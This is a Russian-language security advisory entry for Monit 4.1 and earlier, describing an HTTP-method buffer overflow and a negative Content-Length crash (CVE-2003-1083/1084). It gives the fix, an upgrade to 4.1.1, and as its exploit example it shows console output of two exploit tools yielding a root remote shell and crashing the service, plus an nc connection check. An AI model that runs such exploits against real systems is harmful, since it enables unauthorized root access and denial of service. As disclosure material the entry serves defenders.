Дата публикации: | 25.11.2003 |
Всего просмотров: | 1292 |
Опасность: | Средняя |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2003-1083 CVE-2003-1084 |
Вектор эксплуатации: | Локальная сеть |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | Monit 4.x |
Уязвимые версии: Monit 4.1 и более ранние версии
Описание: Две уязвимости обнаружены в Monit. Злонамеренный пользователь может вызвать отказ в обслуживании или скомпрометировать уязвимую систему. 1. Удаленный атакующий может представить чрезмерно длинный HTTP метод, чтобы вызвать переполнение буфера в HTTP интерфейсе. 2. Удаленный атакующий может посать HTTP запрос с отрицательным значением в поле "Content-Length:", чтобы аварийно завершить работу целевого сервера. Пример/Эксплоит: ./xonya -t 3 -p 2812 192.168.3.12 Selected platform 3 ... Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ... Connected to 192.168.3.12:2812 Sending the request ... Got a remote shell: Linux 2.4.20 i686 unknown uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) exit $./donit -p 2812 192.168.3.12 Connecting to 192.168.3.12:2812 ... Sending the request ... Done. $ nc -v 192.168.3.12 2812 lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused Решение: Обновите до 4.1.1: http://www.tildeslash.com/monit/dist/ |
|
Ссылки: | Monit 4.1 HTTP interface multiple security vulnerabilities |